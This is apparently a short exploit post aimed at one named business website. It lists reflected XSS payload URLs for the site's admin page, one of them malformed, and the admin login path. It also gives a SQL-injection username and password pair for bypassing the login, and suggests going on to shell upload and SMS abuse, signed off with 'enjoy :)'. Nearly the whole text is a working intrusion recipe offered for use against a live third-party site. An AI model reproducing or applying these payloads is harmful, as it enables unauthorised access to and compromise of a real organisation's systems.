# Exploit Title: www.woodplusco.ir bypass admin login page & XSS vulnerability
# Date:30/11/2019
# Exploit Author: nightr4id
# Tested on:Windows
# Xss Demo
https://www.woodplusco.ir/admin/colors.php?msg=<script>alert(XSS)</alert>
https://www.woodplusco.ir/admin/colors.php?msg=<script>alert(123)</script>
# Admin control panel path
https://www.woodplusco.ir/admin/login.php
# user & pass: '=' 'or'
# Note: You can use other facilities such as Shell Upload and SMS messaging.
enjoy :)